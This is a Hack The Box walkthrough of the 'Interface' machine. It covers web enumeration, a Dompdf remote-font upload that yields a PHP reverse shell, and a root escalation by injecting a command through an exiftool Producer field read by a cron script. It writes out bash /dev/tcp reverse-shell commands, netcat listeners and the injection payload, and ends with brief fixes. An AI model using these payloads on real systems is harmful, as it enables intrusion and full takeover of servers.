Hack The Box Walkthrough - Interface

Hack The Box Walkthrough - Interface


This box was all about enumeration. I had to enumerate everything over and over to find the foothold. All the while trying to avoid rabbit holes.


I started the machine by running Rustscan to check for open ports.

$ rustscan -a target -- -A | tee rust.txt
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------                                                                                                                                                                                                    😡 https://admin.tryhackme.com

[~] The config file is expected to be at "/home/ehogue/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p  ")

[~] Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-09 20:32 EST
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:32


Nmap scan report for target (
Host is up, received conn-refused (0.047s latency).
Scanned at 2023-03-09 20:32:25 EST for 8s

22/tcp open  ssh     syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 7289a0957eceaea8596b2d2dbc90b55a (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDsUhYQQaT6D7Isd510Mjs3HcpUf64NWRgfkCDtCcPC3KjgNKdOByzhdgpqKftmogBoGPHDlfDboK5hTEm/6mqhbNQDhOiX1Y++AXwcgLAOpjfSExhKQSyKZVveZCl/JjB/th0YA12XJXECXl5GbNFtxDW6DnueLP5l0gWzFxJdtj7C57yai6MpHieKm564NOhsA
|   256 01848c66d34ec4b1611f2d4d389c42c3 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGrQxMOFdtvAa9AGgwirSYniXm7NpzZbgIKhzgCOM1qwqK8QFkN6tZuQsCsRSzZ59+3l+Ycx5lTn11fbqLFqoqM=
|   256 cc62905560a658629e6b80105c799b55 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPtZ4bP4/4TJNGMNMmXWqt2dLijhttMoaeiJYJRJ4Kqy
80/tcp open  http    syn-ack nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Site Maintenance
|_http-favicon: Unknown favicon MD5: 21B739D43FCB9BBB83D8541FE4FE88FA
| http-methods:
|_  Supported Methods: GET HEAD
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:32
Completed NSE at 20:32, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:32
Completed NSE at 20:32, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:32
Completed NSE at 20:32, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.99 seconds

Ports 22 (SSH) and 80 (HTTP) were open.

I looked at the website.

Back Soon

It was a simple site that just said they were performing maintenance and that the site would be back soon. The β€˜contact us’ text was a mailto link for β€˜contact@interface.htb’. I added the domain to my hosts file and reloaded the site. It was the same site.

I scanned for hidden files, and for subdomains. But I did not find anything.

The simple web page was requesting a suspicious amount of JavaScript for a page with just a few lines of text.


I spent a lot of time reading all the JS for that site. I looked for vulnerabilities in the Next.js framework.

Eventually, I took a closer look at the CSP header.

Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' 'self' data: https://www.google.com http://www.google-analytics.com/gtm/js https://*.gstatic.com/feedback/ https://ajax.googleapis.com; connect-src 'self' http://prd.m.rendering-api.interface.htb; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://www.google.com; img-src https: data:; child-src data:;

There was a subdomain (http://prd.m.rendering-api.interface.htb) listed in there. I added it to my hosts file and tried to navigate to it. It returned a 200, but said β€˜File not found’.

I ran feroxbuster on the new subdomain. It found a β€˜vendor’ folder that returned and 403. I ran feroxbuster on that folder, found another folder given a 403. I kept digging until I found Dompdf.

$ feroxbuster -u http://prd.m.rendering-api.interface.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -m GET,POST

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher πŸ€“                 ver: 2.7.3
 🎯  Target Url            β”‚ http://prd.m.rendering-api.interface.htb
 πŸš€  Threads               β”‚ 50
 πŸ“–  Wordlist              β”‚ /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt
 πŸ‘Œ  Status Codes          β”‚ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
 πŸ’₯  Timeout (secs)        β”‚ 7
 🦑  User-Agent            β”‚ feroxbuster/2.7.3
 πŸ’‰  Config File           β”‚ /etc/feroxbuster/ferox-config.toml
 🏁  HTTP methods          β”‚ [GET, POST]
 πŸ”ƒ  Recursion Depth       β”‚ 4
 πŸŽ‰  New Version Available β”‚ https://github.com/epi052/feroxbuster/releases/latest
 🏁  Press [ENTER] to use the Scan Management Menuβ„’
403      GET        1l        2w        0c http://prd.m.rendering-api.interface.htb/vendor
403     POST        1l        2w        0c http://prd.m.rendering-api.interface.htb/vendor
[####################] - 3m    239202/239202  0s      found:2       errors:0
[####################] - 3m    239202/239202  1129/s  http://prd.m.rendering-api.interface.htb/

$ feroxbuster -u http://prd.m.rendering-api.interface.htb/vendor/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -m GET,POST -x php

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher πŸ€“                 ver: 2.7.3
 🎯  Target Url            β”‚ http://prd.m.rendering-api.interface.htb/vendor/
 πŸš€  Threads               β”‚ 50
 πŸ“–  Wordlist              β”‚ /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt
 πŸ‘Œ  Status Codes          β”‚ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
 πŸ’₯  Timeout (secs)        β”‚ 7
 🦑  User-Agent            β”‚ feroxbuster/2.7.3
 πŸ’‰  Config File           β”‚ /etc/feroxbuster/ferox-config.toml
 πŸ’²  Extensions            β”‚ [php]
 🏁  HTTP methods          β”‚ [GET, POST]
 πŸ”ƒ  Recursion Depth       β”‚ 4
 πŸŽ‰  New Version Available β”‚ https://github.com/epi052/feroxbuster/releases/latest
 🏁  Press [ENTER] to use the Scan Management Menuβ„’
403      GET        1l        2w        0c http://prd.m.rendering-api.interface.htb/vendor/dompdf
403     POST        1l        2w        0c http://prd.m.rendering-api.interface.htb/vendor/dompdf
200      GET        0l        0w        0c http://prd.m.rendering-api.interface.htb/vendor/autoload.php
200     POST        0l        0w        0c http://prd.m.rendering-api.interface.htb/vendor/autoload.php
403      GET        1l        2w        0c http://prd.m.rendering-api.interface.htb/vendor/composer
403     POST        1l        2w        0c http://prd.m.rendering-api.interface.htb/vendor/composer
[####################] - 17m   358803/358803  0s      found:6       errors:0
[####################] - 17m   358803/358803  341/s   http://prd.m.rendering-api.interface.htb/vendor/

$ feroxbuster -u http://prd.m.rendering-api.interface.htb/vendor/dompdf/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -m GET,POST -x php

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher πŸ€“                 ver: 2.7.3
 🎯  Target Url            β”‚ http://prd.m.rendering-api.interface.htb/vendor/dompdf/
 πŸš€  Threads               β”‚ 50
 πŸ“–  Wordlist              β”‚ /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt
 πŸ‘Œ  Status Codes          β”‚ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
 πŸ’₯  Timeout (secs)        β”‚ 7
 🦑  User-Agent            β”‚ feroxbuster/2.7.3
 πŸ’‰  Config File           β”‚ /etc/feroxbuster/ferox-config.toml
 πŸ’²  Extensions            β”‚ [php]
 🏁  HTTP methods          β”‚ [GET, POST]
 πŸ”ƒ  Recursion Depth       β”‚ 4
 πŸŽ‰  New Version Available β”‚ https://github.com/epi052/feroxbuster/releases/latest
 🏁  Press [ENTER] to use the Scan Management Menuβ„’
403      GET        1l        2w        0c http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf
403     POST        1l        2w        0c http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf
[####################] - 21m   358803/358803  0s      found:2       errors:0
[####################] - 21m   358803/358803  274/s   http://prd.m.rendering-api.interface.htb/vendor/dompdf/

$ feroxbuster -u http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -m GET,POST -x php

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher πŸ€“                 ver: 2.7.3
 🎯  Target Url            β”‚ http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/
 πŸš€  Threads               β”‚ 50
 πŸ“–  Wordlist              β”‚ /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt
 πŸ‘Œ  Status Codes          β”‚ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
 πŸ’₯  Timeout (secs)        β”‚ 7
 🦑  User-Agent            β”‚ feroxbuster/2.7.3
 πŸ’‰  Config File           β”‚ /etc/feroxbuster/ferox-config.toml
 πŸ’²  Extensions            β”‚ [php]
 🏁  HTTP methods          β”‚ [GET, POST]
 πŸ”ƒ  Recursion Depth       β”‚ 4
 πŸŽ‰  New Version Available β”‚ https://github.com/epi052/feroxbuster/releases/latest
 🏁  Press [ENTER] to use the Scan Management Menuβ„’
403      GET        1l        2w        0c http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/lib
403     POST        1l        2w        0c http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/lib
403      GET        1l        2w        0c http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/tests
403     POST        1l        2w        0c http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/tests
403      GET        1l        2w        0c http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/src
403     POST        1l        2w        0c http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/src
403      GET        1l        2w        0c http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/VERSION
403     POST        1l        2w        0c http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/VERSION
403      GET        1l        2w        0c http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/.git
403     POST        1l        2w        0c http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/.git
403      GET        1l        2w        0c http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/.gitignore
403     POST        1l        2w        0c http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/.gitignore
[####################] - 17m   358803/358803  0s      found:12      errors:0
[####################] - 17m   358803/358803  338/s   http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/

$ feroxbuster -u http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/src/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -m GET,POST -x php

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher πŸ€“                 ver: 2.7.3
 🎯  Target Url            β”‚ http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/src/
 πŸš€  Threads               β”‚ 50
 πŸ“–  Wordlist              β”‚ /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt
 πŸ‘Œ  Status Codes          β”‚ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
 πŸ’₯  Timeout (secs)        β”‚ 7
 🦑  User-Agent            β”‚ feroxbuster/2.7.3
 πŸ’‰  Config File           β”‚ /etc/feroxbuster/ferox-config.toml
 πŸ’²  Extensions            β”‚ [php]
 🏁  HTTP methods          β”‚ [GET, POST]
 πŸ”ƒ  Recursion Depth       β”‚ 4
 πŸŽ‰  New Version Available β”‚ https://github.com/epi052/feroxbuster/releases/latest
 🏁  Press [ENTER] to use the Scan Management Menuβ„’
403      GET        1l        2w        0c http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/src/Css
403     POST        1l        2w        0c http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/src/Css
403      GET        1l        2w        0c http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/src/Image
403     POST        1l        2w        0c http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/src/Image
200      GET        0l        0w        0c http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/src/Options.php
200     POST        0l        0w        0c http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/src/Options.php
200      GET        0l        0w        0c http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/src/Helpers.php
200     POST        0l        0w        0c http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/src/Helpers.php
403      GET        1l        2w        0c http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/src/Frame
403     POST        1l        2w        0c http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/src/Frame
200      GET        0l        0w        0c http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/src/Frame.php
200     POST        0l        0w        0c http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/src/Frame.php
403      GET        1l        2w        0c http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/src/Renderer
403     POST        1l        2w        0c http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/src/Renderer
500      GET        0l        0w        0c http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/src/Renderer.php
500     POST        0l        0w        0c http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/src/Renderer.php
403      GET        1l        2w        0c http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/src/Exception
403     POST        1l        2w        0c http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/src/Exception
200      GET        0l        0w        0c http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/src/Exception.php
200     POST        0l        0w        0c http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/src/Exception.php
[####################] - 15m   358803/358803  0s      found:20      errors:0
[####################] - 15m   358803/358803  381/s   http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/src/

I looked for vulnerabilities in Dompdf. I found one in the way it handled fonts. But I had no way to exploit it. The PHP files I had were all classes. I had no entry point to execute code in those classes.

So I kept looking. At one point, I considered the fact that the subdomain name had β€˜api’ in it and tried the β€˜/api’ endpoint. It gave me a 404, which explains why Feroxbuster had ignored it, but with a different error message.

GET /api/ HTTP/1.1
Host: prd.m.rendering-api.interface.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 404 Not Found
Server: nginx/1.14.0 (Ubuntu)
Date: Fri, 10 Mar 2023 20:54:17 GMT
Content-Type: application/json
Connection: keep-alive
Content-Length: 50

  "status": "404",
  "status_text": "route not defined"

I tried enumerating it.

$ feroxbuster -u http://prd.m.rendering-api.interface.htb/api/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -m GET,POST -C 404 -xphp

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher πŸ€“                 ver: 2.7.3
 🎯  Target Url            β”‚ http://prd.m.rendering-api.interface.htb/api/
 πŸš€  Threads               β”‚ 50
 πŸ“–  Wordlist              β”‚ /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt
 πŸ’’  Status Code Filters   β”‚ [404]
 πŸ’₯  Timeout (secs)        β”‚ 7
 🦑  User-Agent            β”‚ feroxbuster/2.7.3
 πŸ’‰  Config File           β”‚ /etc/feroxbuster/ferox-config.toml
 πŸ’²  Extensions            β”‚ [php]
 🏁  HTTP methods          β”‚ [GET, POST]
 πŸ”ƒ  Recursion Depth       β”‚ 4
 πŸŽ‰  New Version Available β”‚ https://github.com/epi052/feroxbuster/releases/latest
 🏁  Press [ENTER] to use the Scan Management Menuβ„’
422     POST        1l        2w        0c http://prd.m.rendering-api.interface.htb/api/html2pdf
[####################] - 16m   358803/358803  0s      found:1       errors:10
[####################] - 16m   358803/358803  354/s   http://prd.m.rendering-api.interface.htb/api/

Feroxbuster found a β€˜html2pdf’ endpoint. That was really promising considering the potential vulnerability in Dompdf.

I tried sending requests to it.

POST /api/html2pdf HTTP/1.1
Host: prd.m.rendering-api.interface.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 422 Unprocessable Entity
Server: nginx/1.14.0 (Ubuntu)
Date: Fri, 10 Mar 2023 21:31:03 GMT
Content-Type: application/json
Connection: keep-alive
Content-Length: 36

  "status_text": "missing parameters"

It needed a parameter, so I tried β€˜html’

POST /api/html2pdf HTTP/1.1
Host: prd.m.rendering-api.interface.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/json
Content-Length: 57

"html": "<html><body>adfsadfaskjfads</body></html>"

It worked. I got a PDF file in return.

HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Fri, 10 Mar 2023 21:41:54 GMT
Content-Type: application/pdf
Content-Length: 0
Connection: keep-alive
X-Local-Cache: miss
Cache-Control: public
Content-Transfer-Encoding: Binary
Content-Disposition: attachment; filename=export.pdf


Not that I had an entry point. I took a better look at Snyk’s post. They also provided a GitHub repository with an example exploit. The exploit used the way Dompdf handles fonts to upload a PHP file, and then access it in the cache.

I used the provided reverse shell font.

POST /api/html2pdf HTTP/1.1
Host: prd.m.rendering-api.interface.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/json
Content-Length: 81

    "html": "<link rel=stylesheet href=''>"

The application loaded the CSS and the font from my machine. But I could not access uploaded PHP. The blog post mention this being harder as the file gets renamed, and the cache can be in a different place. From my enumeration, I already knew where Dompdf was. I looked at the code and saw that the hash that was added to the font name and family was simply an MD5 of where it was downloaded from.

$ echo -n "" | md5sum
842b6ee4726ff6acf88d95fcec66762d  -

With that, I could access the uploaded PHP file at β€˜http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/lib/fonts/rshell_normal_842b6ee4726ff6acf88d95fcec66762d.php’.

I encoded the bash reverse shell command to make using it as a URL parameter easier.

$ echo 'bash  -i >& /dev/tcp/  0>&1  ' | base64

I started a netcat listener and navigated to the font PHP file.


I was in the machine and I had the user flag.

$ nc -klvnp 4444
listening on [any] 4444 ...
connect to [] from (UNKNOWN) [] 48832
bash: cannot set terminal process group (1296): Inappropriate ioctl for device
bash: no job control in this shell

www-data@interface:~/api/vendor/dompdf/dompdf/lib/fonts$ ls /home
ls /home

www-data@interface:~/api/vendor/dompdf/dompdf/lib/fonts$ ls /home/dev
ls /home/dev

www-data@interface:~/api/vendor/dompdf/dompdf/lib/fonts$ cat /home/dev/user.txt
<dor/dompdf/dompdf/lib/fonts$ cat /home/dev/user.txt

Getting root

Once on the box, I looked for commands I could run with sudo, and for suid executables. I didn’t find any. I also checked for files belonging to www-data or dev. There was nothing suspicious.

I uploaded pspy to the server and let it run for a while.

2023/03/11 14:15:01 CMD: UID=0     PID=21078  | /bin/bash /root/clean.sh
2023/03/11 14:15:01 CMD: UID=0     PID=21077  | /bin/bash /root/clean.sh
2023/03/11 14:15:01 CMD: UID=0     PID=21076  | /bin/sh -c /root/clean.sh
2023/03/11 14:15:01 CMD: UID=0     PID=21075  | /usr/sbin/CRON -f
2023/03/11 14:15:01 CMD: UID=0     PID=21079  | cp /root/font_cache/dompdf_font_family_cache.php.bak /root/font_cache/dompdf_font_family_cache.php
2023/03/11 14:15:01 CMD: UID=0     PID=21080  | chown www-data /root/font_cache/dompdf_font_family_cache.php
2023/03/11 14:15:01 CMD: UID=0     PID=21081  | /bin/bash /root/clean.sh
2023/03/11 14:15:01 CMD: UID=0     PID=21082  | mv /root/font_cache/dompdf_font_family_cache.php /var/www/api/vendor/dompdf/dompdf/lib/fonts/dompdf_font_family_cache.php
2023/03/11 14:16:01 CMD: UID=0     PID=21085  | /bin/bash /usr/local/sbin/cleancache.sh
2023/03/11 14:16:01 CMD: UID=0     PID=21084  | /bin/sh -c /usr/local/sbin/cleancache.sh
2023/03/11 14:16:01 CMD: UID=0     PID=21083  | /usr/sbin/CRON -f
2023/03/11 14:16:01 CMD: UID=0     PID=21086  |

There was a β€˜cleancache’ script that ran every two minutes. I looked at what it did.

www-data@interface:/dev/shm$ cat /usr/local/sbin/cleancache.sh
#! /bin/bash
for cfile in "$cache_directory"/*; do

    if [[ -f "$cfile" ]]; then

        meta_producer=$(/usr/bin/exiftool -s -s -s -Producer "$cfile" 2>/dev/null | cut -d " " -f1)

        if [[ "$meta_producer" -eq "dompdf" ]]; then
            echo "Removing $cfile"
            rm "$cfile"



It was looking at files in β€˜/tmp’ and using β€˜exiftool’ to read the Producer metadata. Then it deleted all the files that were not created by Dompdf.

I spent a lot of time looking for vulnerabilities in exiftool. The server had two versions, and the one used by the script was older. So I was sure that this was what I needed to exploit. I found vulnerabilities in exiftool, but none that I could exploit.

I also tried to send a malicious payload in the producer to try to execute code in the if statement. Nothing I tried worked.

I found an interesting blog post. I tried the technique in the post, but it failed.

www-data@interface:/tmp$ touch test

www-data@interface:/tmp$ exiftool -Producer='a[$(date >&2)]+42' test
    1 image files updated

www-data@interface:/tmp$ /usr/local/sbin/cleancache.sh

/usr/local/sbin/cleancache.sh: line 9: [[: a[$(date: bad array subscript (error token is "a[$(date")
Removing /tmp/test_original

I kept playing with it, and after some time I realized that it was the space that was the issue. If I removed it, the command got executed.

www-data@interface:/tmp$ touch test

www-data@interface:/tmp$ exiftool -Producer='a[$(date>&2)]+42' test
    1 image files updated

www-data@interface:/tmp$ /usr/local/sbin/cleancache.sh
Mon Mar 13 00:01:37 UTC 2023
Removing /tmp/test_original

I create a small script to open a reverse shell to my machine.

www-data@interface:/tmp$ cat /dev/shm/rev.sh

bash -c 'bash -i >& /dev/tcp/ 0>&1'

I made the script executable and I modified the producer of a file to launch the script.

www-data@interface:/tmp$ chmod +x /dev/shm/rev.sh

www-data@interface:/tmp$ touch test

www-data@interface:/tmp$ exiftool -Producer='a[$(/dev/shm/rev.sh>&2)]+42' test
    1 image files updated

I launched a netcat listener and waited for the script to run.

$ nc -klvnp 4445
listening on [any] 4445 ...
connect to [] from (UNKNOWN) [] 48880
bash: cannot set terminal process group (3755): Inappropriate ioctl for device
bash: no job control in this shell

root@interface:~# cat /root/root.txt
cat /root/root.txt


This box had a library with a know vulnerability. The Snyk post mentions that the issue was not fixed at the time they published it. I don’t know if it has been patched since. But they mention an easy way to protect against this issue. You can turn off the loading remote font by setting the isRemoteEnabled setting to false.

The issue with the cleanup script is harder for me. I don’t do much bash scripting, so I don’t know how to process user’s input in a secure manner. But fixing it remains easy. If you generate temporary files, you can put them in a folder that contains nothing else and delete everything in it.